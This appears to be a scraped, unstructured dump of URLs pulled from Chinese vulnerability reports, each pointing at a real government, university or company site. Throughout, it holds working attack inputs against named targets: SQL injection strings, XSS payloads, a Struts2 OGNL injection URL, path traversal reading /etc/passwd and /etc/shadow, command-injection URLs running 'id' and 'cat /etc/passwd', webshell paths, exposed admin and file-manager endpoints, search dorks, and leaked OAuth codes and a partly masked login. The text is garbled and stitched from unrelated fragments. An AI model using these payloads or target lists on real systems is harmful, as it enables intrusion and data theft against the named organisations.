http://my.dealer.it168.com/Info/Credit.aspx http://image.it168.com/dealerphoto/shop/500x375/0/275/275150.jpg http://image.it168.com/dealerphoto/shop/500x375/0/275/275149.jpg http://image.it168.com/dealerphoto/shop/500x375/0/275/275147.jpg http://image.it168.com/dealerphoto/shop/500x375/0/275/275146.jpg http://image.it168.com/dealerphoto/shop/500x375/0/275/275136.jpg http://image.it168.com/dealerphoto/shop/500x375/0/275/275145.jpg inurl:/main/model/newinfo inurl:newinfo.do?infoId http://www.***.gov.cn/main/model/newsoperation/webEditor/eWebEditor.jsp 
http://mgt.dns.com.cn/main/api_login.php?Domain=cnwzrise&Suffix=.com&Passwd=9A***Bi&EppOwner=agent1***6 http://www.qliaozhai.com/uploadfile/2013/0228/20130228010517368.jpg/1.php http://iread.wo.com.cn/ http://61.189.63.58/manager/html/ http://app.sina.cn/ranks.php?vt=4&cat=200 http://portal.vsdndata.com/ http://m.antakids.com/ http://www1.scst.gov.cn:90/Tech_Contract/BackDoor/SpecialColumn.aspx http://www1.scst.gov.cn:90/Tech_Contract/BackDoor/VideoCtl.aspx http://www1.scst.gov.cn:90/Tech_Contract/BackDoor/pg_left.aspx http://biotech.ustc.edu.cn/BiotechWeb/BioTech/Pages/BT10/BT100200.aspx?businessId=Default http://biotech.ustc.edu.cn/BiotechWeb/BioTech/Pages/BT10/BT100200.aspx?businessId=Default http://www.sppa.zjut.edu.cn/存在SQL注射 www.tv189.com网站权限绕过或是设计逻辑缺陷,导致影像资源可以未经任何授权而获得。 http://www.hebcf.org.cn/comment_detail.php?commentid=52 http://gzcxw.nmjt.gov.cn:9080/cdsxxporxxx/ http://gzcxw.nmjt.gov.cn:9080/cdsxxporxxx/UserFiles/Image/test/no.jsp http://gzcxw.nmjt.gov.cn:9080/cdsxxporxxx/baseControl/js/editor/FCKeditor/editor//filemanager/browser/default/browser.html?Type=&Connector=connectors/jsp/connector http://gzcxw.nmjt.gov.cn:9080/cdsxxporxxx/baseControl/ http://219.159.71.119/manager/html/upload IP:220.248.245.154 http://ln-n-tax.gov.cn/jis/front/lngs/userregister.jsp http://www.cicams.ac.cn//web/site_search.aspx?searchKey=%27 http://sdlgjjc.sdut.edu.cn)存在SQL注射 http://itbbs.pconline.com.cn/bbs/51224970.html http://benyouhui.it168.com/.svn/entries http://wzb.gxun.edu.cn)存在SQL注射 http://www.sanfu.com/?mod=goods&do=index_new&action=search&search_word= http://gov.demo.powereasy.net/User/Register.aspx随便注册一个用户1,来到用户的短消息验证处。 http://paxy.10010zj.com.cn/ http://zdjc.zju.edu.cn/system/webos/login.htm http://zdjc.zju.edu.cn/system/user/ http://www.econ.fudan.edu.cn/ema/switchdetail.php?pid=696 http://jjsj.neuq.edu.cn/ register.zhenai.com/login/sendmobile.jsps?sendMobile=马赛克&d=马赛克', static.zhenai.com/profile/validatePhoneByCode.jsps 
profile.zhenai.com/login/loginactionindex.jsps http://news.wit.edu.cn http://www.chinabenet.com/ http://lt.imobile.com.cn/forum.php?mod=viewthread&tid=10482730&extra= http://www.ctyun.cn/ http://i.wo.com.cn/ www.zhiji.com/product_buy/updateorderbyjp.asp自动修改zhijicount值,然“系统自动提交订单,请稍等片刻...”就不用管了,这样免去了对域名的验证,话说目前改为手工确认了啊? http://120.209.138.136:8080/admin/index.php http://120.209.138.136/js/kindeditor/php/file_manager_json.php?path=/zwmsites/chinamobile/ http://120.209.138.136/js/kindeditor/php/file_manager_json.php?path=/ http://www.cdthr.com/rcpj/index.jsp http://219.141.254.195/djqy/login.jsp)也同样适用。 http://www.cdthr.com/rcpj/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://sso.118114.cn/SSO/loginV2.action yjszs.hfut.edu.cn/news.php?id=188 site:kugou.cm inurl:profile http://www.henan-cdt.com/ http://www.mybift.com/thread-546065-1-1.html http://mba.xmu.edu.cn/cmd.jsp http://www.ujs.edu.cn/index/counter.php?id=1 http://218.205.167.233/ https://59.49.15.130:8080/ https://59.49.15.130 http://59.49.15.130:82/log/ecology_20140120.log http://sh.suning.com/life/ch/charge/queryBill.action?typeCode=06&areaCode=351&companyId=172&modeCode=5&chargeAccount=13313413683&invoiceTitle=&refresh=0.9008850780531467 http://www.tjportnet.com/ http://www.gpai.net/index_index.action?searchKind=1&searchType=1¤tPage=1 http://cdt-bcfd.com http://yjsh.gxu.edu.cn/)存在SQL注射 http://www.qahrss.gov.cn/index.action http://www.qahrss.gov.cn/newsPage.action?mid=92&orgid=1 http://www.qahrss.gov.cn/110.htm http://www.gxsdkyy.com/admin/login.aspx?re=http://www.gxsdkyy.com/admin/default.aspx http://imo.iflytek.com/server/loginBindkd.php http://www.gsws.gov.cn/list.jsp?classid=9 http://imo.iflytek.com/server/loginBindkd.php http://211.139.191.144:8001/ http://dev.10086.cn/,且利用网址在dev.10086.cn不存在。故猜测是测试点?! 
http://211.139.191.144:8001/cmdn/phpMyAdmin/ http://dev.10086.cn/ http://211.139.191.144:8001/cmdn/phpMyAdmin/libraries/select_lang.lib.php http://dev.10086.cn/,两个网站数据库相通的??由于屌丝没法付费破解管理员cmd,且无人帮我,故放弃从网站后台getshell。到此测试结束。 http://cenet.nau.edu.cn/read.asp?id=18 http://client.3g.soufun.com/http/wap/appdownload/download_sfb.html http://client.3g.soufun.com/http/pgservice.jsp?dst=这里是手机号码&messagename=sentmessage&product=soufunbang&time=0.9652428204202439 http://client.3g.soufun.com/http/pgservice.jsp?dst=这里是手机号%26&messagename=sentmessage&product=soufunbang&time=0.9652428204202439 http://x.kuwo.cn/KuwoLive/lb/MyPage?uid=124668296 http://125.93.53.70/SSO/LogOn?ReturnUrl=%2f http://125.93.53.70:9998/ http://125.93.53.70:9998/admin-console/login.seam http://yjszs.hfut.edu.cn/news.php?id=210 http://jcn.scbid.gov.cn/jdjg/WebResource.axd?d=W4rBKx5e5z02dfEHW7yEzw2 http://localhost/MainS http://emed.3322.org/WebService/MainService.asmx urn:schemas-microsoft-com:asm http://bbs.caipiao.58.com/ http://999120.net/ http://bbs.sm.91.com//install/data/update.php http://t.gmw.cn http://iwm.baidu.com/main.html http://m.jx.189.cn/ http://shop.easternmiles.com/solr/ http://web.alltrust.com.cn http://web.alltrust.com.cn/admin-console/login.seam?conversationId=17 http://web.alltrust.com.cn/TWCSM/jsp/sys/login.jsp http://yangtian.lenovo.com.cn/yangtian.tar.gz http://www.legendcapital.com.cn/Admin/fckeditor/editor/filemanager/connectors/test.html http://www.legendcapital.com.cn/legendcapital.rar Nasdaq:AMAP)。高德拥有导航电子地图甲级测绘资质、测绘航空摄影甲级资质和互联网地图服务甲级测绘资质“三甲”资质,其优质的电子地图数据库成为公司的核心竞争力。高德的业务覆盖三大领域: https://openapi.baidu.com/oauth/2.0/authorize?response_type=code&client_id=foRRWjPq8In3SIhmKQw1Pep3&redirect_uri=http://www.renren.com/bind/baidu/baiduLoginCallBack http://www.renren.com/bind/baidu/baiduLoginCallBack?code=f056147c661d0b9fbb6cd305567cb994 http://bras.nju.edu.cn:8080/selfservice/login inurl:info_details.jsp?seq http://www.website.com/editortpxx/upload.jsp 
http://www.cnu.edu.cn/editortpxx/upload.jsp http://crjy.cnu.edu.cn/zjxy/editortpxx/upload.jsp http://www.biem.edu.cn/editortpxx/upload.jsp http://sw.nedu.edu.cn/editortpxx/upload.jsp http://www.usrn.edu.cn/editortpxx/upload.jsp https://passport.sohu.com/user/tologin http://mail.sohu.com/ http://login.mail.sohu.com/ http://dealer.auto.sohu.com/admin/auth/login.html http://220.181.153.163/cgi-bin/mfs/mfs.cgi?CSrev=0&HDtime=1&HDaddrname=1&CCdata=10.180.153.84%3A9422&CSorder=10§ions=MO http://218.70.65.213/t_index.do http://222.66.39.203/fileupdown/2012-06-15/468303238279230000110000002/456-OA22.doc http://125.64.100.12/ http://125.64.100.12/manage/ http://www.gzcdc.gov.cn/ site:160.com inurl:profile http://www.gzsums.net/bycn/list.aspx?bid=39&cid=750 http://www.gzsums.net/yuanchenhuizhen/hzdtll.asp?id=258 http://hr.gzsums.net:8888/performance/kh_plan/get_code_treeinputinfo.jsp?codesetid= http://login.10086.cn/html/login/login.html http://login.10086.cn/sendRandomCodeAction.action http://www.zzpn.gov.cn/wjj/index.html http://blog.163.com/ap27301_cos/ http://www.zhongchou.cn/home/id-176205 http://www.zhongchou.cn/注册一账户。然后登录,在个人设置里面写上一个简单的测试语句吧,如图 http://uais.lzu.edu.cn/)存在SQL注射 http://uais.lzu.edu.cn/)存在SQL注射 http://59.108.229.254:8088/user/gotoLoginPage.action inurl:website/deptwebsite/Content.jsp?filePath=/ http://www.nxbb.gov.cn/website/deptwebsite/0566/Content.jsp?issueId=38603&msgType=00&filePath=//WEB-INF/web.xml http://www.dayawan.gov.cn/website/deptwebsite/0109/Content.jsp?issueId=18606&msgType=00&filePath=/WEB-INF/web.xml http://www.gdnx.gov.cn/website/deptwebsite/0477/Content.jsp?issueId=18606&msgType=00&filePath=/WEB-INF/web.xml http://www.gdnx.gov.cn/portal/admin/video/AddVideo.jsp http://www.dayawan.gov.cn/portal/admin/offdocsearch/addItem.jsp http://www.dayawan.gov.cn/portal/admin/video/AddVideo.jsp http://59.39.89.120/portal/admin/gazette/InsertFile.jsp http://market.heyuan.gov.cn/ http://59.39.89.120//website/datum/gazette/wooyun.jsp 
http://bbs.letv.com/static/image/common/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28/xss/%29}}// http://so.letv.com http://so.letv.com/s?wd=%3Csvg+onload%3Dalert%28document.cookie%29%3E&from=pc&ref=click http://ui.letv.com/home.php?mod=space&uid=34270019&do=blog&quickforward=1&id=187 http://sgmj.pps.tv/index.php?m=front&c=sgmj&a=news_list&cateid=136 http://www.zhongchou.cn/deal-topic/id-4931 http://login.wdcq.pps.tv/webgame/createplay.do http://login.wdcq.pps.tv/webgame/createplay.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://humancapital.cufe.edu.cn/)存在SQL注射 http://115.182.51.39/ http://gzcx.hnjt.gov.cn http://gzcx.hnjt.gov.cn/admin http://segmentfault.com/ http://whois.www.net.cn/whois/api_whois_full http://www.baidu.com webshell:http://www.schouqin.gov.cn:89/job/jspspy.jsp。 http://www.weimob.com/.svn/entries http://www.bgs.qtc.edu.cn/WebFormNews.aspx?TNID=235%20& http://www.bgs.qtc.edu.cn/WebFormNews.aspx?TNID=235%20&orgid=1 http://www.bgs.qtc.edu.cn/UpLoad/files/jc.asp http://www.piaolala.com http://www.piaolala.com/buy/creatOrder.do?cinemaCode=73180&ticketId=731801&ticketNum=1&marketcode=undefined http://www.newbalance.com.cn/manage/news.aspx http://www.newbalance.com.cn/manage/userlist.aspx http://www.auditexam.cn/ http://www.auditexam.cn/exam/simulativeExamShow.do?seId=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL# http://www.sxsmyxx.cn/tsims/xxi/index_xxi.asp?cz=wjgl&lx=&bti=13 http://www.hbjdxx.com.cn/tsims/xxi/index_xxi.asp?cz=wjgl&lx=&bti=13 
http://www.ndjd.cn:8003/xxi/index_xxi.asp?cz=xxxx&lx=%B2%BF%C3%C5%D0%C5%CF%A2&bti=6 http://www.sxjzwx.com/tsims/xxi/index_xxi.asp?cz=wjgl&lx=&bti=13 http://124.163.243.26:4000/xxi/index_xxi.asp?cz=wjgl&lx=&bti=13 http://www.pds12319.gov.cn/ http://www.pds12319.gov.cn/portal!ask.action?sign=tszx&pNo= http://www.pds12319.gov.cn/zc.htm http://ued.taobao.org/*** http://ued.taobao.org/*** ued.taobao.org/*** http://ued.taobao.org/*** https://api.weibo.com/oauth2/authorize?client_id=482040646&response_type=code&with_offical_account=1&redirect_uri=http://passport.tianya.cn/third/sinaweibo.do http://passport.tianya.cn/third/sinaweibo.do?code=7c0350d1c8dee1a333c15bf8725fc4f9 http://api.kaixin001.com/oauth2/authorize?response_type=code&client_id=832443644017752d378f4d7bc545c3c6&redirect_uri=http://passport.ku6.com/kaixin-userBindCallback.htm?redirect=http://my.ku6.com/my_account/accountbinding&scope=basic%20create_records http://passport.ku6.com/kaixin-userBindCallback.htm?redirect=http://my.ku6.com/my_account/accountbinding&code=4a4720dcf978aba67fbff22e1bdb7aab site:hitao.com https://graph.qq.com/oauth2.0/authorize?response_type=code&scope=get_user_info,get_simple_userinfo,add_topic,upload_pic,add_share&redirect_uri=http%3A%2F%2Fpassport2.pcbaby.com.cn%2Fpassport2%2Fapi%2Fopen_oauth.jsp&state=loginBind%3Dhttp%3A%2F%2Fmy.pcbaby.com.cn%2Fpassport%2Fopens%2Fbind_done.jsp%26type%3Dqzone_baby%26return%3Dhttp%3A%2F%2Fmy.pcbaby.com.cn%2Fuser%2Fsetting%2Fshare.jsp&client_id=219493 http://passport2.pcbaby.com.cn/passport2/api/open_oauth.jsp?code=406961C061F11A3759E738FE5DB95256&state=loginBind%3Dhttp%3A%2F%2Fmy.pcbaby.com.cn%2Fpassport%2Fopens%2Fbind_done.jsp%26type%3Dqzone_baby%26return%3Dhttp%3A%2F%2Fmy.pcbaby.com.cn%2Fuser%2Fsetting%2Fshare.jsp 
https://graph.qq.com/oauth2.0/authorize?response_type=code&scope=get_user_info,get_simple_userinfo,add_topic,upload_pic,add_share&redirect_uri=http%3A%2F%2Fpassport2.pcbaby.com.cn%2Fpassport2%2Fapi%2Fopen_oauth.jsp&state=loginBind%3Dhttp%3A%2F%2Fmy.pcbaby.com.cn%2Fpassport%2Fopens%2Fbind_done.jsp%26type%3Dqzone_baby%26return%3Dhttp%3A%2F%2Fmy.pcbaby.com.cn%2Fuser%2Fsetting%2Fshare.jsp&client_id=219493 http://passport2.pcbaby.com.cn/passport2/api/open_oauth.jsp?code=406961C061F11A3759E738FE5DB95256&state=loginBind%3Dhttp%3A%2F%2Fmy.pcbaby.com.cn%2Fpassport%2Fopens%2Fbind_done.jsp%26type%3Dqzone_baby%26return%3Dhttp%3A%2F%2Fmy.pcbaby.com.cn%2Fuser%2Fsetting%2Fshare.jsp https://graph.qq.com/oauth2.0/authorize?response_type=code&scope=get_user_info,get_simple_userinfo,add_topic,upload_pic,add_share&redirect_uri=http%3A%2F%2Fpassport2.pcauto.com.cn%2Fpassport2%2Fapi%2Fopen_oauth.jsp&state=loginBind%3Dhttp%3A%2F%2Fmy.pcauto.com.cn%2Fpassport%2Fopens%2Fbind_done.jsp%26type%3Dqzone_auto%26return%3Dhttp%3A%2F%2Fmy.pcauto.com.cn%2Fsetting%2Fshare.jsp&client_id=219603 http://passport2.pcauto.com.cn/passport2/api/open_oauth.jsp?code=B2F61AFEDABB482FFE7245C7C05FAD08&state=loginBind%3Dhttp%3A%2F%2Fmy.pcauto.com.cn%2Fpassport%2Fopens%2Fbind_done.jsp%26type%3Dqzone_auto%26return%3Dhttp%3A%2F%2Fmy.pcauto.com.cn%2Fsetting%2Fshare.jsp https://api.weibo.com/2/oauth2/authorize?response_type=code&redirect_uri=http%3A%2F%2Fpassport2.pchouse.com.cn%2Fpassport2%2Fapi%2Fopen_oauth.jsp&state=loginBind%3Dhttp%3A%2F%2Fmy.pchouse.com.cn%2Fpassport%2Fopens%2Fbind_done.jsp%26type%3Dsina_house%26return%3Dhttp%3A%2F%2Fmy.pchouse.com.cn%2Fsetting%2Fshare.jsp&client_id=1207940458 passport2.pchouse.com.cn/passport2/api/open_oauth.jsp?state=loginBind%3Dhttp%3A%2F%2Fmy.pchouse.com.cn%2Fpassport%2Fopens%2Fbind_done.jsp%26type%3Dsina_house%26return%3Dhttp%3A%2F%2Fmy.pchouse.com.cn%2Fsetting%2Fshare.jsp&code=ae66952a8177151cd58e452e11e4729d http://monitor.jlu.edu.cn/view_ap_png.php?id=nq_jxa2&mode=2 
http://kjcg.jlu.edu.cn/ http://kjcg.jlu.edu.cn/pages/kjcgdt/read.aspx?id=7 http://127.0.0.1/install.asp http://www.seebong.com/ResetPassword.aspx http://www.axny.gov.cn/admin/Upfile.asp http://www.coop.ln.gov.cn/yw_info.asp?id=4373 http://gongcheng.gohigh.com.cn/admin http://ovs.iflytek.com/public/change_password?&md1=wffITuct8rJhZ63vwwCRcusSIrrNRho http://www.cetools.cn/index.php/cetools/login http://sanlianbuys.shopex.cn/xxx.php。打开一看,疑似图片马。 http://manager-b2b.shopex.cn/login.php。这是shopex某分销平台下的后台管理系统,光看这个界面就知道管理员对这个页面有多不重视了。 http://sanlianbuys.shopex.cn/info.php http://sanlianbuys.shopex.cn/test.php http://sm.91.com/portal.php http://www.snepb.gov.cn/ldxx.asp?cn=100338&id=3837 http://www.zyshbj.gov.cn进行扫描时 http://www.zyshbj.gov.cn/upload.htm http://192.168.0.250:16788/eyooboard/index.php http://192.168.0.250:16788/apps/1/6/server/setting.php http://www.gsfzb.gov.cn/spplay.asp?ArticleID=88660 http://www.qhqxj.gov.cn/qxyw/list.asp?id=13001 site:bbs.kuaibo.com bbs.kuaibo.com/space-uid-15868974.html http://www.fdjr.net/altfadmin/Login.asp http://www.earthhour.org.cn/solution.php?id=506 http://baozouwushuang.com//index.php?c=ajaxproxy&url=../../../../../../../../../../etc/passwd http://baozouwushuang.com/index.php?c=ajaxproxy&url=index.php http://baozouwushuang.com/index.php?c=ajaxproxy&url=http://www.baidu.com http://www.job51.com/ http://oa.job51.com/ http://www.qszj.gov.cn/ ftp://58.218.199.94/ ftp://job51.com/ ftp://oa.job51.com/ ftp://qszj.gov.cn/ http://www.aituan.com/duobao/1547 http://www.aituan.com/duobao/1547* http://popkart.tiancity.com/webphp/screenshots2/showpic.php?id=158 
http://www.youku.com/service/feed/subtype/2/?code=5000&videoID=XNTgyMDI4NTYw&quality=flv&vs=2891.666&vt=%E6%AF%9B%E9%AA%97%20%E7%AC%AC%E4%BA%8C%E5%AD%A3%20112?code=5000&videoID=XNTgyMDI4NTYw&quality=flv&vs=2891.666&vt=%E6%AF%9B%E9%AA%97%20%E7%AC%AC%E4%BA%8C%E5%AD%A3%20112%E2%80%9Casd?code=5000&videoID=XNTgyMDI4NTYw&quality=flv&vs=2891.666&vt=%E6%AF%9B%E9%AA%97%20%E7%AC%AC%E4%BA%8C%E5%AD%A3%20112?code=5000&videoID=XNTgyMDI4NTYw&quality=flv&vs=2891.666&vt=%E6%AF%9B%E9%AA%97%20%E7%AC%AC%E4%BA%8C%E5%AD%A3%20112%27%22%3E%3Ca%3E?code=5000&videoID=XNTgyMDI4NTYw&quality=flv&vs=2891.666&vt=%E6%AF%9B%E9%AA%97%20%E7%AC%AC%E4%BA%8C%E5%AD%A3%20112?code=5000&videoID=XNTgyMDI4NTYw&quality=flv&vs=2891.666&vt=%E6%AF%9B%E9%AA%97%20%E7%AC%AC%E4%BA%8C%E5%AD%A3%20112%E2%80%9Casd?code=5000&videoID=XNTgyMDI4NTYw&quality=flv&vs=2891.666&vt=%E6%AF%9B%E9%AA%97%20%E7%AC%AC%E4%BA%8C%E5%AD%A3%20112?code=5000&videoID=XNTgyMDI4NTYw&quality=flv&vs=2891.666&vt=%27%3E%3Csvg/onload=alert%28document.domain%29%2b%27 http://119.145.255.2:8081 http://119.145.255.2:8081/common/jsp/file.jsp http://agent.baihe.com/login.action http://help.xs8.cn/user_comment.php?action=add http://cq.bnet.cn/hccDocInfoEx.do?action=list http://zj.bnet.cn/lhzxExProdProduct.do?action=showsearchaplist&flag=zjWeb http://www.shcssnet.com.cn/companyweb/index.htm http://www.dongfeng-honda.com/honda_mediaReport.php?nid=604 URL:www.mmwj.gov.cn/gqxx/gq_detail.php?id=2 http://shibada.scnu.edu.cn/wp-admin/ http://shibada.scnu.edu.cn/wp-content/themes/18da/index1.php http://unitown.scnu.edu.cn/ShowMTeachPlanList.php?SelectType=coll&Depart_coll=%B9%E3%B6%AB%CD%E2%D3%EF%CD%E2%C3%B3%B4%F3%D1%A7%%27 pwd:lihh http://book.dahe.cn http://book.dahe.cn/book/content.asp?id=19 http://job.tuniu.com/index/jobs_list http://job.tuniu.com//society/JobInfo/searchJobs?type_id=31 http://bbs.zx.taobao.com/ http://licaike.hexun.com,貌似是和讯网旗下一个产品购买平台 http://licaike.hexun.com/List.action?monthRiseRate=100 http://ggzx.stock.hexun.com/这个站上 
http://ggzx.stock.hexun.com/more.jsp?t=2&s=2&k=8350 http://jypx.cdpnet.org/login.aspx http://demo.jypx.cdpnet.org/ http://www.symc.edu.cn/database/PowerEasy5.mdb,并且其中密码过于简单 http://www.chshcms.com/ http://pfd.ceair.com/finhome/index.php?m=member&c=index&a=login&forward=http%3A%2F%2Fpfd.ceair.com%2Ffinhome%2Findex.php http://dealer.zol.com.cn/kindeditor/php/file_manager_json.php?path=/www/ http://dealer.zol.com.cn/kindeditor/php/file_manager_json.php?path=/ http://www.veerchina.com/index.php?r=photoRequest/requestList&orderType=add_time http://www.veerchina.com/index.php?r=photoRequest/requestList&orderType=add_time http://jyxy.swu.edu.cn/down.php?file_name=../../index.php http://www.gantuan.com/review/5573.html http://www.gantuan.com/review/5573*.html http://121.28.41.118:8080 http://calendar.hexun.com这个站点 http://calendar.hexun.com/FData/Default_Day.aspx?date=2014-03-30 https://api.weibo.com/oauth2/authorize?client_id=1705224951&redirect_uri=http%3A%2F%2Flogin.2345.com%2Foauth%2Fbind%2Fweibo_callback&response_type=code&forcelogin=true http://login.2345.com/oauth/bind/weibo_callback?code=c05f66e4ee5e00d26978d47aca52f49d http://wooyun.org/common/uploadFile.jsp http://xxoo.com/common/codewidget.jsp?code=1 http://218.206.27.196:8800/app_chongqing/u004/touch/init.action http://bbs.caipiao.58.com/thread-152934-1-1.html https://graph.renren.com/oauth/authorize?client_id=117231&response_type=code&scope=publish_feed,photo_upload&state=a%3d1%26b%3d2&redirect_uri=http%3A%2F%2Fwww.5sing.com%2FOpenLoginRecive%3Ftype%3D3%26refUrl%3Dhttp%3A%2F%2Fwww.5sing.com%2Fmy%2Fset%2Fbindsns%2F3%3Fcommand%3Dbind&x_renew=true http://www.5sing.com/OpenLoginRecive?type=3&refUrl=http://www.5sing.com/my/set/bindsns/3?command=bind&code=lwz0gikwKpUP3cM8G4eYO28qGSgP0PDf&state=a%3D1%26amp%3Bb%3D2 http://202.121.166.112:8080/ecupl/login.action http://www.btsafety.gov.cn/ http://percent.178.com/getGame.php?type=text&qid=368 
http://www.chinanews-info.com/pub/small.do?table=9&type=2&file=../../../../../etc/shadow%00.png http://www.kkfcw.com/jiaoyihelp/list.asp?sort=1 http://www.kkfcw.com/service/index.asp?id=1 http://www.kkfcw.com/news/list.asp?sort=11 http://www.panshi.gov.cn/ http://item.jd.com/1085146.html这个商品,那么加入购物车只需要在地址栏键入http://cart.jd.com/cart/dynamic/gate.action?pid=185146&pcount=1&ptype=1 http://123.126.33.43/.svn/entries http://123.126.33.42/.svn/entries http://123.126.33.209/.svn/entries http://www.sxu.edu.cn/zncs/yjsxy/admin/adminlogin.asp http://www.sxu.edu.cn/zncs/yjsxy/admin/admin.asp http://i5.imgs.letv.com/ajax/.svn/entries http://i5.imgs.letv.com/user/.svn/entries http://cmsv53.xywy.com/mycontrol/cmsmycontrol/login.php http://58.210.91.230:6060 http://www.hyszx.gov.cn http://219.243.39.24/ http://219.243.39.24//wctju3/sds/printSearch.aspx http://219.243.39.24//wctju3/baobiao/jgfpgl_cx.aspx http://wpmv.jx.wo.com.cn/down.jsp?songid=20130507043.mp3 http://www.kcjc.net/uc_server/data/config.inc.php.bak http://item.mop.com/user/myItems.do http://bbs.jiasule.com/forum.php http://partner.gd.chinamobile.com/viewLogin.action http://flv1.vodfile.m1905.com/movie/2014/0X/XX/moivefilename/moivefilename.flv http://www.114menhu.com http://www.weimob.com/Webreserve/DeleteBook http://m.mail.sohu.com的问题。 http://www.gztata.com/tt.asp?id=3 http://www.yedao.com/detail.php?cid=38&pid=32 http://mail.sdta.gov.cn mail.sdta.gov.cn/orgadmin mail.sdta.gov.cn/sysadmin http://www.114menhu.com http://ylc.test.dazhongcai.com/index.php?g=Admin_no_one_konw_cjh&m=Login&a=index http://ylc.test.dazhongcai.com/nongye.php/Admin_no_one_konw_cjh/Login/ http://ylc.test.dazhongcai.com/lvyou.php/Admin_no_one_konw_cjh/Login/ http://ylc.test.dazhongcai.com/lvxingshe.php/Admin_no_one_konw_cjh/Login/ http://121.14.129.111/ http://jifen.qq.com/mall/mall.shtml搜索中输入: http://www.wooyun.org http://pyedf.tju.edu.cn/ http://www.suzhoushilla.com/en/news/?page=2&keys=200&keys_title= 
http://www.google.de/#filter=0&newwindow=1&q=inurl:GetPassWordByAnswer.aspx http://219.242.65.10/fsweb/CheckTick.aspx?fullname=%e8%af%bb%e8%80%85%e6%9d%a1%e7%a0%81&Login=hmtmmgsa&logintype=BARCODE&password=%e7%99%bb%e5%bd%95%e5%af%86%e7%a0%81&URL=http://www.baidu.com http://library.scac.edu.cn/jpweb/CheckTick.aspx?fullname=%e8%af%bb%e8%80%85%e6%9d%a1%e7%a0%81&Login=hmtmmgsa&logintype=BARCODE&password=%e7%99%bb%e5%bd%95%e5%af%86%e7%a0%81&URL=http://www.baidu.com http://www.gqt.gov.cn/sb.php http://221.181.0.42/ http://218.19.163.121:8080/ntss/ http://218.19.163.121:8080/ntss/login!welcome.action http://ipv6te.bnu.edu.cn/ http://target.com:8081/mem_user.php?action=search&user_login_name=|cat%20/etc/passwd http://target.com:8081/log.php?uname=1|cat%20/etc/passwd%20%3E/tmp/12.txt http://target.com:8081/online_user.php?uname=|cat%20/etc/passwd http://target.com:8081/online_user.php?ip=|uname http://target.com:8081/online_user.php?flux=|id http://target.com:8081/online_user_rad.php?flux=|id http://target.com:8081/show_flux.php?eth=|id%20%3E%20/tmp/22.txt http://shell.cnfol.com/zhidao/getquestion.php?qnum=7&strnum=17&qstatus=ok&var=js&css=6001&cid=14986 http://xjwww.fmmu.edu.cn/D.rar http://xjwww.fmmu.edu.cn/bzxxq/ly_show2.asp?uid=1 http://net.chinamobile.com/netmeeting/index.html http://bqeyxy.jlu.edu.cn/sql/ http://www.jslegal.com/View.php?ID=118717 http://jobs.china-sss.com,在提交个人简历一块,可以提交附件,为前端文件类型限制,可以抓包突破,上传任意文件,包括网马。 http://mall.china-sss.com/order/orderMessage/2014033143106,想想看是否可以越权查看其他用户的信息呢,试了试,结果是可以的。 http://ccp.sxrc.com.cn/onews.asp?id=143存在 http://edu.nmjxt.com/ http://edu.nmjxt.com/login.asp::$DATA http://edu.nmjxt.com/index.asp::$DATA http://edu.nmjxt.com/conn.asp::$DATA http://www.zj.10086.cn/shop/shop/user/orderQuery/searchOrderById.do?orderId=ff80808144dc40110144df36c5440d96 http://www.zj.10086.cn/shop/shop/user/orderQuery/searchOrderById.do?orderId=ff80808144dc40110144e14c9d2711e2 
http://www.zj.10086.cn/shop/shop/user/orderQuery/searchOrderById.do?orderId=ff80808144dc40110144dfd7516d10bf http://wooyun.org/bugs/wooyun-2014-051123 http://bbs.160.com/thread-84876-1-1.html http://bbs.m1905.com/mk.txt http://lm.8864.com/Video/video_show.php?id=9239 http://121.193.130.63:8080/phone/query.do http://www.gsesch.com/Article_Class.asp?ClassID=3&ClassIDIn=1 http://www.rgrcb.com/ site:rgrcb.com http://www.rgrcb.com/manage/Manage_Index.php http://www.rgrcb.com/manage/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.rgrcb.com/manage/fckeditor/editor/filemanager/connectors/php/connector.php https://www.gzekt.com/YoukeAction_youkeLogin.action http://www.nbweekly.com/member/col_memberCenter_register.aspx http://data.ent.people.com.cn/korea_star/getperson.php?id=42'+and+'1'='1 www.baidu.com www.baidu.com www.a.shifen.com www.a.shifen.com www.a.shifen.com http://kyc.gzhmc.edu.cn/editor_new/upload.jsp http://m.miqi.cn/team.php?id=111634 http://m.miqi.cn/list.php?type=cat&id=988&brand_id=344 http://m.miqi.cn/list.php?type=cat&id=988&eff_id=344 http://www.gdzjxf.com/ http://www.gdzjxf.com/php/search.php http://graduate.buaa.edu.cn/TutorInfo.jsp?id=135405 http://www.mysoft.com.cn/sitecn/job_head.aspx?t=1 http://localhost/EasyTalk_X2.5/admin.php?s=/Users/edituser http://tdyw.tju.edu.cn/blog/ http://202.113.13.175/yhvote/vote_detail.php?id=20%27&PHPSESSID=511682211e11dc394882b84f3733c0d2 http://tdyw.tju.edu.cn/news_detail.php?sub=1&id=2812%27 http://tdyw.tju.edu.cn/friends/user/user_detail.php?id=85%27 http://www.ahstgt.gov.cn/ http://www.court.gov.cn/gzhd/gtpt/extension/ http://gest.jlu.edu.cn/admin/login.php http://gest.jlu.edu.cn/pic/2.php http://www.tudou.com/albumplay/UGzxzvdIk3g/RAT-g6mAVtU.html http://www.tudou.com/programs/view/html5embed.action?code=RAT-g6mAVtU http://www.tudou.com/albumplay/0lkeNVDn53g/kriPjgMQM4c.html http://www.tudou.com/programs/view/html5embed.action?code=kriPjgMQM4c 
